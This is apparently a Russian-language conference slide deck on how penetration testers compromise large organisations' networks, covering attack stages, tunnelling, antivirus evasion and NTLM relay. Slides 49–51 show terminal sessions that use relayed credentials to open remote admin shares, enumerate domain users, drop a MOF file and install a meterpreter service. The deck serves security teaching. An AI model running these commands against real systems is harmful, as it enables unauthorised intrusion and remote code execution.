1. Истории из жизни. Как взламывают
сети крупных организаций.
Дмитрий Евтеев

2. Что такое крупная сеть?
- информационная система, в которой > 1.000 пользователей
Архитектура крупной сети предполагает:
• Централизованное управление
• Единый источник идентификаторов
• Единая точка аутентификации и авторизации
• Территориальная распределенность
Введение

3. Веб-приложения
Интерфейсы администрирования
…и прочий «зоопарк»
DNS, интерфейсы обработки электронных сообщений, FTP,
интерфейсы СУБД, LDAP, VPN/IPSEC, Netbios/SMB, Proxy/Socks, SNMP,
NTP…
Что содержится на периметре

4. Телеком
На большом количестве сетевых устройств, найдутся такие, где
используются дефолты.
Промышленность
На большом количестве идентификаторов пользователей, найдутся
такие, которые используют слабые пароли к удаленному перебору.
Интересные наблюдения (по отрасли)

5. Госсектор
Неоправданно высокое внимание к отдельным направлениям
обеспечения ИБ, наравне с отсутствием внимания к ИБ в целом.
Финансовый сектор
Пристальное внимание только к системам, обрабатывающим данные
держателей пластиковых карт, позволяет использовать уязвимости в
смежных системах.
Интересные наблюдения (по отрасли)

6. Россия
• Linux/Apache/MySQL/PHP (LAMP)
Индия
• Linux/Tomcat/Oracle&DB2/Java
Китай
• Windows/IIS/MSSQL/ASP.NET
Интересные наблюдения (по региону)

7. Основные этапы проведения атаки
Выявление целей и сбор данных об объектах
исследования
Сокрытиеследов
Поиск и эксплуатация уязвимостей
Сбор данных с новым уровнем доступа
Повышение привилегий
Сбор данных с новым уровнем доступа
Развитие атаки с имеющимися привилегиями
Закрепление своего присутствия

8. Соблюдение законов
Например: низя читать электронную пошту
Ограниченное время
Минимизация воздействия
Например: низя «убивать» аверов
Отчетность
Иногда требуется протокол всех совершаемых действий…
помимо пятисот страничного технического отчета
Оговорка по пентестам

9. Nmap, Nessus, etc.
Rapid7 Metasploit Framework
Immunity CANVAS
CORE Impact
SAINTexploit
Другие источники:
• public eq exploit-db.com
• private …
Поиск и эксплуатация уязвимостей

10. Доставка полезной нагрузки
Обеспечение «транспорта»
Задачи, которые стоят перед атакующим

11. Обеспечение «транспорта» (сценарий 1)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)

12. Обеспечение «транспорта» (сценарий 1)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)

13. Обеспечение «транспорта» (сценарий 1)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)

14. Обеспечение «транспорта» (сценарий 1)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)
http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf

15. Обеспечение «транспорта» (сценарий 1)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)

16. История из жизни («транспорт» через proxy)
АРМ аудитора
Интернет
1
2
3
4
5
8
10
12
9
14
1315
16
17

17. Обеспечение «транспорта» (сценарий 2)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)

18. Обеспечение «транспорта» (сценарий 2)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

19. Обеспечение «транспорта» (сценарий 2)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)

20. Обеспечение «транспорта» (сценарий 2)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)

21. История из жизни (реакция админа на tsh)

22. Обеспечение «транспорта» (сценарий 3)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)

23. Обеспечение «транспорта» (сценарий 3)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)
http://http-tunnel.sourceforge.net/
http://sensepost.com/labs/tools/pentest/reduh
http://sourceforge.net/projects/webtunnel/

24. Обеспечение «транспорта» (сценарий 3)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)
http://http-tunnel.sourceforge.net/
http://sensepost.com/labs/tools/pentest/reduh
http://sourceforge.net/projects/webtunnel/

25. Обеспечение «транспорта» (сценарий 3)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)
http://http-tunnel.sourceforge.net/
http://sensepost.com/labs/tools/pentest/reduh
http://sourceforge.net/projects/webtunnel/

26. История из жизни («транспорт» и доставка полезной
нагрузки через Lotus Domino)

27. «Транспорт» может быть разным…

28. За что я люблю крупные сети

29. Обход ограничений безопасности
http://devteev.blogspot.ru/2012/10/windows.html

30. Rapid7 Metasploit Framework :: meterpreter
Immunity CANVAS :: MOSDEF
CORE Impact :: Syscall Proxy Agent
SAINTexploit
Пост-эксплуатация

31. Как обходятся аверы (1/3)

32. Как обходятся аверы (2/3)

33. Как обходятся аверы (3/3)

34. Как обходятся аверы (3/3)
http://blog.gentilkiwi.com/mimikatz

35. Первостепенная цель атакующего - IAM / IDM

36. Но, как часто это бывает…

37. http://devteev.blogspot.ru/2012/02/drg-8-microsoft.html
Как взламывают сети Microsoft

38. LM - LAN Manager
NTLM - NT LAN Manager
NTLMv2
Kerberos
Протоколы аутентификации в сетях Microsoft

39. NTLM аутентификация
http://squirtle.googlecode.com/files/NTLM%20is%20D
ead%20-%20DefCon%2016.pdf

40. NTLM-Relay
http://webstersprodigy.net/2012/07/22/metasploit-generic-ntlm-relay-module/

41. Аутентификация по NTLMv1

42. Альтернатива NTLM-Relay (1/2)
Mark Gamache,
http://markgamache.blogspot.ru/2013/01/ntlm-
challenge-response-is-100-broken.html

43. Альтернатива NTLM-Relay (1/2)
Mark Gamache,
http://markgamache.blogspot.ru/2013/01/ntlm-
challenge-response-is-100-broken.html

44. Альтернатива NTLM-Relay (2/2)
http://www.ampliasecurity.com/research/wcefaq.html

45. Owned in 60 seconds with ZackAttack (1/7)
Zack Fase (@zfasel),
https://github.com/zfasel/ZackAttack

46. Owned in 60 seconds with ZackAttack (2/7)

47. HTTP -> SMB NTLM relay
Owned in 60 seconds with ZackAttack (3/7)

48. Owned in 60 seconds with ZackAttack (4/7)

49. ~# proxychains smbclient -U DNPRODUCTIE/admin%any //192.168.1.1/C$
ProxyChains-3.1 (http://proxychains.sf.net)|S-chain|-<>-127.0.0.1:4532-<><>-
192.168.1.1:445-<><>-OK
Domain=[DNPRODUCTIE] OS=[Windows Server 2003 3790 Service Pack 2]
Server=[Windows Server 2003 5.2]
smb: > ls
AUTOEXEC.BAT A 0 Mon Jan 28 10:20:37 2013
boot.ini AHS 213 Mon Jan 28 09:53:27 2013
...
~# proxychains smbclient -U DNPRODUCTIE/admin%any //192.168.1.2/C$
~# proxychains net rpc user -U"DNPRODUCTIE/admin"%"any" -S 192.168.1.1
ProxyChains-3.1 (http://proxychains.sf.net)|DNS-response|: bt is not exist|S-chain|-
<>-127.0.0.1:4532-<><>-192.168.1.1:445-<><>-OK
admin
IUSR_WAD
IWAM_WAD
krbtgt
...
Owned in 60 seconds with ZackAttack (5/7)

50. exec over winmgmt
~/mof# proxychains smbclient -U"WGW/ADMIN"%"any" //192.168.1.1/ADMIN$
ProxyChains-3.1 (http://proxychains.sf.net) |S-chain|-<>-127.0.0.1:4532-<><>-
192.168.1.1:445-<><>-OK
Domain=[DNPRODUCTIE] OS=[Windows Server 2003 3790 Service Pack 2]
Server=[Windows Server 2003 5.2]
smb: > cd system32/wbem/mof
smb: system32wbemmof> put q.mof
putting file q.mof as system32wbemmofq.mof (1173.8 kb/s) (average 1173.8
kb/s)
smb: system32wbemmof>
респект Вячеславу Егошину @vegoshin
Owned in 60 seconds with ZackAttack (6/7)

51. exec over metsvc
~# proxychains net rpc service create meterpreter meterpreter
"192.168.1.5testmetsvc.exe service" -U"WGW/ADMIN"%"any" -S 192.168.1.1
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:4532-<><>-192.168.1.1:445-<><>-OK
Successfully created Service: meterpreter
~# proxychains net rpc service start meterpreter -U"WGW/ADMIN"%"any" -S
192.168.1.1
Owned in 60 seconds with ZackAttack (7/7)

52. Реализация успешного сценария атаки – это как
правило использование больше одной уязвимости
Чем больше по размеру информационная система, тем
больше возможных путей для реализации атак
Вместо заключения: простые истины

53. Спасибо за внимание!
sdevteev@gmail.com
http://devteev.blogspot.com
https://twitter.com/devteev